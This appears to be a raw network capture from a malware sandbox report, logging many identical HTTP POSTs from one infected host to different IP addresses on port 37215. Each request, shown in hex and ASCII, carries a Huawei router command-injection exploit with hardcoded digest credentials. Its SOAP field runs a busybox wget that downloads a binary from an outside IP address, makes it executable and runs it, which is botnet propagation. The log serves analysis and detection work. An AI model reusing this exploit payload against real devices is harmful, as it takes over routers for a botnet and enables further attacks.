                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1266192.168.2.1545340197.49.178.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729836941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1267192.168.2.1536228197.150.119.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729839087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1268192.168.2.1552170197.145.95.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729851961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1269192.168.2.1544858197.197.64.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729861975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1270192.168.2.1540136197.141.99.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729867935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1271192.168.2.1550584197.41.99.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729870081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1272192.168.2.1554880197.200.37.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729908943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1273192.168.2.1559170197.58.77.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729909897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1274192.168.2.1558018197.128.210.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729967117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1275192.168.2.1555178197.85.250.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729969025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
